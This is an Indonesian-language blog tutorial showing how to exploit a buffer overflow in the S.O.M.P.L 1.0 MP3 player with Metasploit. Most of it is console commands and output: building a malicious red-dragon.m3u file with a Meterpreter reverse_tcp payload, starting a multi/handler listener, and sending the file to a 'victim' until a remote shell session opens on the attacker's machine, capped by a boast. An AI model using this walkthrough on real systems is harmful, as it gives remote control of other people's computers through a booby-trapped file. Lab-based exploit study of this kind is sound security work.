Vulnerability ini saya dapatkan dari Exploit-DB. Kemudian di modifikasi oleh metasploit sehingga attacker dapat menggunakan payload yang beragam. Untuk mengujinya, pertama saya mendownload MP3 Player ini dari Softpedia. Kemudian menjalankan MP3 player ini di Windows XP SP2 English Version.
Tutorial Requirements:
1. metasploit
2. SOMPL Player
3. Windows XP SP2
4. vmware
Conditions:
1. Attacker IP : 10.10.1.1
2. Target IP : 10.10.1.128
Jika semua persiapan sudah siap, maka anda bisa memulai tutorial ini.
Walkthrough:
1. Buat malicious file
Pada konsol metasploit, kita dapat mencari exploit, payload, nops, auxiliary, encoder, dan post yang kita inginkan. Perintah ini dapat dieksekusi dengan
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf > search
Contoh, jika kita hendak mencari encoder shikata_ga_nai, maka kita masukan perintah:
Note: Tulisan yang dicetak merah, adalah output. Yang dicetak biru adalah input.
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf > search shikata_ga_nai
Matching Modules
================
Name Rank Description
---- --------- -----------
encoder/x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
Untuk mencari exploit yang akan kita gunakan, maka kita masukan perintah
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf > search sompl
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/fileformat/somplplayer_m3u 2010-01-22 great S.O.M.P.L 1.0 Player Buffer Overflow
Kemudian kita gunakan exploit ini untuk membuat malicious file, yang kemudian akan dikirimkan ke target.
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf > use exploit/windows/fileformat/somplplayer_m3u
msf exploit(somplplayer_m3u) >
Kemudian kita atur file ini dengan opsi yang disediakan.
1. PAYLOAD : Menentukan payload yang akan digunakan oleh attacker.
2. FILENAME : Nama malicious file yang akan dibuat
Note : Jika anda menggunakan PAYLOAD reverse, maka anda akan menggunakan opsi berikut:
1. LHOST : IP Attacker
2. LPORT : Attacker's port listener
Note : Jika anda menggunakan PAYLOAD bind, maka anda akan menggunakan opsi berikut:
1. RHOST: IP Target
2. LPORT : Target's port listener
Anda juga bisa menggunakan encoder dalam membuat file ini:
1. ENCODER
Atur setiap opsi dengan perintah
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf exploit(somplplayer_m3u) > set [OPTION] [VALUE]
Contoh, kali ini saya menggunakan
1. PAYLOAD: windows/meterpreter/reverse_tcp
2. FILENAME : red-dragon.m3u
3. LHOST : 10.10.1.1
4. LPORT: 4444
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf exploit(somplplayer_m3u) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(somplplayer_m3u) > set FILENAME red-dragon.m3u
FILENAME => red-dragon.m3u
msf exploit(somplplayer_m3u) > set LHOST 10.10.1.1
LHOST => 10.10.1.1
msf exploit(somplplayer_m3u) > set LPORT 4444
LPORT => 4444
msf exploit(somplplayer_m3u) >
Kemudian kita buat file dengan mengeksekusi perintah
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf exploit(somplplayer_m3u) > exploit
[*] Creating 'red-dragon.m3u' file ...
[+] red-dragon.m3u stored at /root/.msf4/local/red-dragon.m3u
File kita telah di simpan di /root/.msf4/local/red-draon.m3u. File ini yang akan membuka akses attacker untuk mendapat sesi meterpreter.
2. Setup Exploit Multi Handler
Setelah file terbuat, maka langkah selanjutnya adalah mengatur exploit multi hander, dan menjalankan listener pada koneksi meterpreter yang terpicu. Untuk menggunakan multi hanlder, kita dapat menggunakan perintah
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf > use exploit/multi/handler
msf exploit(handler) >
Kemudian kita atur opsi yang ada, SAMA seperti yang telah kita atur pada langkah pertama.
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.10.1.1
LHOST => 10.10.1.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) >
Setelah semua telah diatur, kita jalankan exploit ini dengan perintah
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf exploit(handler) > exploit
[*] Started reverse handler on 10.10.1.1:4444
[*] Starting the payload handler...
TIDAK akan ada sesi meterpreter yang muncul jika payload kita belum terpicu, untuk itu, kita kirimkan file ini kepada korban, dan menunggu sampai korban membuka file ini dengan SOMPL player.
3. RED-DRAGON is OWNING!
Setelah korban menjalankan file ini dengan SOMPL player, maka SOMPL player akan mengalami buffer overflow, dimana program menjadi tidak stabil dan tidak merespon perintah.
Dan kita mendapat sesi meterpreter pada konsol metasploit kita..
Command :
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15464 updated today (2012.06.17)
msf exploit(handler) > exploit
[*] Started reverse handler on 10.10.1.1:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 10.10.1.128
[*] Meterpreter session 1 opened (10.10.1.1:4444 -> 10.10.1.128:1059) at 2012-06-18 11:35:10 +0700
meterpreter >
You are so....
0wn3d by red-dragon
0 comment:
Post a Comment